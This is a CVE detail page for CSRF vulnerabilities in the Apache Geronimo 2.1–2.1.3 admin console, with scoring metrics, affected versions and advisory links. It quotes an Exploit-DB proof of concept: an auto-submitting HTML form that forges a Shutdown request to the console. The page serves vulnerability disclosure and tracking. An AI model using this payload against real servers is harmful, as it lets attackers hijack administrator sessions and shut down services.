CVE-2009-0039 : Detail

CVE-2009-0039

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.77%V3
Network
2009-04-17
12h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in the web administration console in Apache Geronimo Application Server 2.1 through 2.1.3 allow remote attackers to hijack the authentication of administrators for requests that (1) change the web administration password, (2) upload applications, and perform unspecified other administrative actions, as demonstrated by (3) a Shutdown request to console/portal//Server/Shutdown.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 32922

Publication date : 2009-04-15 22h00 +00:00
Author : DSecRG
EDB Verified : Yes

source: https://www.securityfocus.com/bid/34562/info Apache Geronimo Application Server is prone to multiple remote vulnerabilities: - Multiple directory-traversal vulnerabilities - A cross-site scripting vulnerability - Multiple HTML-injection vulnerabilities - A cross-site request-forgery vulnerability Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, execute arbitrary script code, steal cookie-based authentication credentials, and perform certain administrative actions. Apache Geronimo 2.1 through 2.1.3 are vulnerable. <html> <form action='http://www.example/console/portal//Server/Shutdown/__ac0x3console-base0x2ServerManager!-1172254814|0' id=1> <input type=hidden value='Shutdown' name="shutdown"> <input type=submit> </form> </html> <script> document.getElementById(1).submit(); </script>

Products Mentioned

Configuraton 0

Apache>>Geronimo >> Version 2.1

Apache>>Geronimo >> Version 2.1.1

Apache>>Geronimo >> Version 2.1.2

Apache>>Geronimo >> Version 2.1.3

References

http://www.vupen.com/english/advisories/2009/1089
Tags : vdb-entry, x_refsource_VUPEN
http://www.securityfocus.com/bid/34562
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/34715
Tags : third-party-advisory, x_refsource_SECUNIA